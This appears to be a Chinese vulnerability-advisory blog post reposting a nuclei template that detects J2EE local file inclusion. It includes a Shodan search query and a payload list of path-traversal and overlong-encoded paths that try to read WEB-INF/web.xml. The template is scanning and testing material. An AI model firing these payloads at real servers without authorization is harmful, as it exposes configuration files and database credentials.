Generic J2EE LFI Scan Panel - Detect

漏洞信息

漏洞名称: Generic J2EE LFI Scan Panel - Detect

漏洞类型: 文件读取

漏洞等级: 高危

漏洞描述: 该漏洞涉及Generic J2EE Scan Panel,这是一个用于检测J2EE特定LFI(本地文件包含)漏洞的工具。J2EE(Java 2 Platform, Enterprise Edition)是一种广泛使用的企业级Java平台,用于开发和部署企业级应用。该平台因其强大的功能和灵活性,在企业级服务中非常受欢迎。

漏洞解释:此漏洞属于文件读取类型,攻击者可以通过构造特定的URL路径,尝试读取服务器上的敏感文件,如WEB-INF/web.xml。WEB-INF目录通常包含应用程序的配置信息和敏感数据,如果被成功读取,可能会导致严重的信息泄露。技术根源在于应用程序未能正确验证和限制用户输入的路径,导致路径遍历攻击成为可能。

影响分析:成功利用此漏洞的攻击者可以读取服务器上的敏感文件,包括但不限于应用程序的配置文件、数据库连接信息等。这可能导致数据泄露、系统配置暴露,甚至可能被用于进一步的攻击。由于此漏洞不需要认证即可利用,且可以自动化执行,因此风险较高。企业应尽快检查并修复此类漏洞,以防止潜在的安全威胁。

产品名称: Generic J2EE Scan Panel

搜索语法: http.title:”J2EE”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fvulnerabilities%2Fgeneric%2Fgeneric-j2ee-lfi.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69

id: generic-j2ee-lfi

info:
  name: Generic J2EE LFI Scan Panel - Detect
  author: davidfegyver
  severity: high
  description: Generic J2EE Scan panel was detected. Looks for J2EE specific LFI vulnerabilities; tries to leak the web.xml file.
  reference:
    - https://github.com/ilmila/J2EEScan/blob/master/src/main/java/burp/j2ee/issues/impl/LFIModule.java
    - https://gist.github.com/harisec/519dc6b45c6b594908c37d9ac19edbc3
  metadata:
    verified: true
    max-request: 14
    shodan-query: http.title:"J2EE"
  tags: lfi,generic,j2ee

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/"

    matchers:
      - type: word
        words:
          - "J2EE"
          - "Java"
          - "servlet"
        condition: or
        internal: true

  - method: GET
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - "/../../../../WEB-INF/web.xml"
        - "/../../../WEB-INF/web.xml"
        - "/../../WEB-INF/web.xml"
        - "/%c0%ae/%c0%ae/WEB-INF/web.xml"
        - "/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
        - "/%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
        - "/../../../WEB-INF/web.xml;x="
        - "/../../WEB-INF/web.xml;x="
        - "/../WEB-INF/web.xml;x="
        - "/WEB-INF/web.xml"
        - "/.//WEB-INF/web.xml"
        - "/../WEB-INF/web.xml"
        - "/%c0%ae/WEB-INF/web.xml"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<servlet-name>"
          - "</web-app>"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206c56d556f1c1e555ac5b5cd1e86aefc4155612737cc8412335dfe8ec6b2f47d20221008c49a05636936ea39dddadd39c587fa94e4840c961fdd1816dd4a9f06eca6db0:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #文件读取
Generic J2EE LFI Scan Panel - Detect
http://example.com/2025/07/21/github_1831905219/
作者
lianccc
发布于
2025年7月21日
许可协议